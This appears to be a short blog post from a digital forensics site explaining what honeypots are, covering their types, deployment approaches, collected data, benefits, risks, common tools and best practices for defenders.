DFIR Lab

What is honeypot?

A honeypot is a deliberately deployed decoy system, service, or data asset that appears legitimate and vulnerable so it will attract attackers. It’s isolated and closely monitored so defenders can detect, observe, and analyze malicious activity without risking production systems.

Key points

  • Purpose
    • Detect attacks early and generate alerts.
    • Collect intelligence about attacker techniques, tools, and indicators of compromise (IOCs).
    • Divert attackers away from real assets (in production use).
    • Support research, threat hunting, and security team training.
  • Types (by interaction)
    • Low-interaction: Emulates specific services/protocols (easy to deploy, low risk, limited telemetry).
    • Medium-interaction: Offers more realistic service behavior and richer logs.
    • High-interaction: Real systems/services that allow attackers to fully interact (maximal intelligence but higher risk and maintenance).
  • Types (by purpose)
    • Production honeypots: Lightweight, placed in business networks to detect opportunistic attackers.
    • Research honeypots: More complex, used by researchers to study attacker behavior and malware.
  • Deployment architectures
    • Host-based: A decoy machine running services (SSH, web, databases).
    • Network-based: Simulated networks/services responding to network probes.
    • Canary tokens: Small tripwires (URLs, files, credentials) that alert when accessed.
  • Data collected
    • Connection metadata, commands executed, malware samples, exploit payloads, attacker IPs, timing and patterns of activity.
  • Benefits
    • High signal-to-noise detection (activities against a honeypot are almost always malicious).
    • Detailed forensic and behavioral telemetry.
    • Improves IDS/IPS signatures and incident response playbooks.
  • Risks and limitations
    • If not properly isolated, an attacker could pivot from a honeypot to real systems.
    • High-interaction honeypots require significant maintenance and monitoring.
    • Attackers may detect and avoid or fingerprint honeypots, reducing effectiveness.
    • Legal/ethical considerations: check local laws and policies (deployment is not entrapment, but be cautious about data collection and privacy).
  • Common tools/examples
    • Cowrie (SSH/Telnet honeypot), Dionaea (malware capture), Honeyd (network emulation), Canary/Canarytokens (easy deployment), MHN (management) and commercial appliances.
  • Best practices
    • Isolate the honeypot network (segmentation, egress controls).
    • Use strong logging/forensics and centralized collection.
    • Monitor and alert in real time.
    • Keep systems updated and snapshot for recovery.
    • Define legal/compliance rules and notify stakeholders.

When to use one

  • When you want high-confidence detection of adversary activity, need malware samples or attacker TTPs, or want an early-warning system for opportunistic scanning and exploitation attempts.

In short: a honeypot is a monitored decoy used to lure attackers so defenders can detect, analyze, and respond to malicious activity while protecting real assets.

Posted

in

, ,

by

kb001

Tags: